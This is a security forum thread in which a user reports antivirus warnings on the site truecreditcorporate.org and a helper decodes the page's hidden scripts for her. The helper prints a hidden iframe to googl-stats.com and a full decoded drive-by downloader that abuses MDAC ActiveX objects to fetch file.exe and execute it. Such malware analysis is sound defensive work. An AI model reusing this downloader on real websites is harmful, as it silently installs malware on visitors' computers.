truecreditcorporate.org

[cconniejean]

Was wondering if someone could check this for me. Getting the following alert:

Code: [Select]

'http://www.truecreditcorporate.org/'
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: 'http://www.truecreditcorporate.org/'
Information: Contains HEUR/HTML.Malware suspicious code
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.29, VDF 7.1.0.55
I also use Finjan Secure Browsing Plug-in, alerts from it as well.
The requested URL was blocked due to the following reason:
Malicious Behavior Detected! The page or file you requested contains malicious code.

[MysteryFCM]

Ref: http://vurl.mysteryfcm.co.uk/?url=141195

Contains a script that decodes to;

Code: [Select]

<iframe src="http://googl-stats.com/xmlfeed/feed.xmi?SMCe" style="display:none"></iframe>
This claims to be a 500 Internal Server error;

http://vurl.mysteryfcm.co.uk/?url=141196

... but has a script at the very bottom of the page;

Code: [Select]

<script type="text/javascript" src="?aa381f57ec228a9304da2b0a24e6c4b8n76697700n534d4365000000000000"></script>
http://vurl.mysteryfcm.co.uk/?url=141197

This loads another escaped script, that decodes to;

Code: [Select]

function CreateO(o,n)
 {
   var r=null;
   try
   {
     r=o.CreateObject(n)
   }
   catch(e)
   {
   }
   if(!r)
   {
     try
     {
       r=o.CreateObject(n,"")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.CreateObject(n,"","")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject("",n)
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject(n,"")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject(n)
     }
     catch(e)
     {
     }
   }
   return(r);
 }
 function Go(a)
 {
   fname="file.exe";
   var exeurl=document.location+"?5";
   var fso=a.CreateObject("Scripting.FileSystemobject","");
   var sap=CreateO(a,"Shell.Application");
   var x=CreateO(a,"ADODB.Stream");
   var nl=null;
   fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
   x.Mode=3;
   try
   {
     nl=CreateO(a,"Micr"+"osoft.XML"+"HTTP");
     nl.open("GET",exeurl,false);
   }
   catch(e)
   {
     try
     {
       nl=CreateO(a,"MSXML.XMLHTTP");
       nl.open("GET",exeurl,false);
     }
     catch(e)
     {
       try
       {
         nl=CreateO(a,"MSXML.ServerXMLHTTP");
         nl.open("GET",exeurl,false);
       }
       catch(e)
       {
         try
         {
           nl=new XMLHttpRequest();
           nl.open("GET",exeurl,false);
         }
         catch(e)
         {
           return 0;
         }
       }
     }
   }
   x.Type=1;
   nl.send(null);
   rb=nl.responseBody;
   x.Open();
   x.Write(rb);
   x.SaveTofile(fname,2);
   sap.ShellExecute(fname);
   return 1;
 }
 function mdac()
 {
   var i=0;
   var target=new Array("B496C556-6513-11D0-983A-00C04FC21E36","B4963556-65A3-11D0-983A500C04FC29E30","1B9BCEDD-E37E547E1-1322-D4A210617116","0006F033-000050000-C000-000000000046","0006F031-0000-000053000-000000000046","6532070a-7664-45e6-0793-dc1f111d2fc3","64145122-B178-451D-A048-FCFDF33E033C","7F5B7F63-606F-433150A265331E03C01E3D","06723E09-F4C2-43c8-0358-09FCD1DB0766","6396725F-1B2D-4831-A9FD5874847682010","BA018599-1DB3-44f9-83B45461454C842F8","D0C07D56-7C69-43F1-B4A0-25F5A116AB19","E8C3CDDF-C120-496b-205056C07C962476B",null);
   while(target[i])
   {
     var a=null;
     a=document.createElement("7bje3t");
     a.setAttribute("classid","c4sid"+unescape('53A')+target[i]);
     if(a)
     {
       try
       {
         var b=CreateO(a,"S0ell.Ap0lica4ion");
         if(b)
         {
           if(Go(a))return 1;
         }
       }
       catch(e)
       {
       }
     }
     i++;
   }
 }
 mdac();
 
Which seems to download the following (though that wasn't there when I tried);

http://googl-stats.com/xmlfeed/file.exe

[cconniejean]

Thank you for the help. Not to change the topic a bunch, but miss your forum.

[MysteryFCM]

See your PM's